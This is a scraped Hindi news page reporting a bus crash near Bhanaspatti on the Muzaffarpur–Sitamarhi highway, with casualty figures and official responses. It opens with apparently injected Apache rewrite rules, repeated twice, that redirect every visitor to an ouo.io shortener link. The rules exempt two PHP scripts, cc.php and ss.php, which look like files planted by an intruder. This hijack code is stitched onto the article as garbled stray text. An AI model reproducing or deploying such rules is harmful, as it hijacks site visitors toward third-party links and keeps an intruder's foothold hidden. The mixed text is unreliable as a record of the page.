
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 527
Previousमुजफ्फरपुर/सीतामढ़ी। मुजफ्फरपुर में आज शाम एक बस भनसपट्टी के पास हादसे का शिकार हो गई। बताया जा रहा है कि यह बस मुजफ्फरपुर से औराई होते हुए बसुआ—डुमरी की ओर जा रही थी तभी मुजफ्फरपुर—सीतामढ़ी एनएच—77 पर हादसे का शिकार हो गई। हादसे में 14 की मौत हो गई। इनमें 11 यात्रियों की मौके पर ही मौत हो गई, जबकि इलाज के दौरान तीन यात्रियों की मौत हो गई। 46 जख्मी यात्रियों में से एक को पटना रेफर कर दिया गया, जबकि 45 जख्मी को एसकेएमसीएच में भर्ती कराया गया है। 35 सीटर बस में करीब 60 लोग सवार थे। बस के अनियंत्रित होते ही चालक बस से कूद गया। एसकेएमसीएच में जख्मी का हाल जानने के बाद मौके पर तिरहुत प्रमंडल के कमिश्नर एच श्रीनिवास व मुजफ्फरपुर के जोनल आईजी सुनील कुमार कैंप कर रहे हैं। जख्मी सूर्यकांत झा ने बताया कि मुजफ्फरपुर बस स्टैंड से चले थे। भनसपट्टी हाईवे लाइन होटल के निकट बस चालक का संतुलन बिगड़ गया। बस पुल की रेलिंग को तोड़ती हुई 40 फीट नीचे गड्ढे में गिर गई। बस की छत पर बैठे यात्री दूर फेंका गए। टोल प्लाजा से क्रेन पहुंचने पर बस को खींच कर निकाला गया। इसके बाद बस से 11 यात्रियों के शव निकाले गए। चीख-पुकार के बीच स्थानीय लोग बचाव व राहत कार्य में लगे रहे। बड़ी दुर्घटना की सूचना पर एसकेएमसीएच से सरकारी व प्राइवेट एंबुलेंस को मौके पर भेजा गया। सीतामढ़ी डीएम राजीव रौशन व एसपी हरि प्रसाथ भी मौके पर पहुंच गए। एसडीओ, बीडीओ भी मौके पर पहुंचे।
मुख्यमंत्री नीतीश कुमार ने बस हादसे पर गहरा शोक व्यक्त किया है। उन्होंने हादसे में जान गंवा बैठे लोगों के परिजनों को तत्काल अनुग्रह अनुदान देने का आदेश दिया है।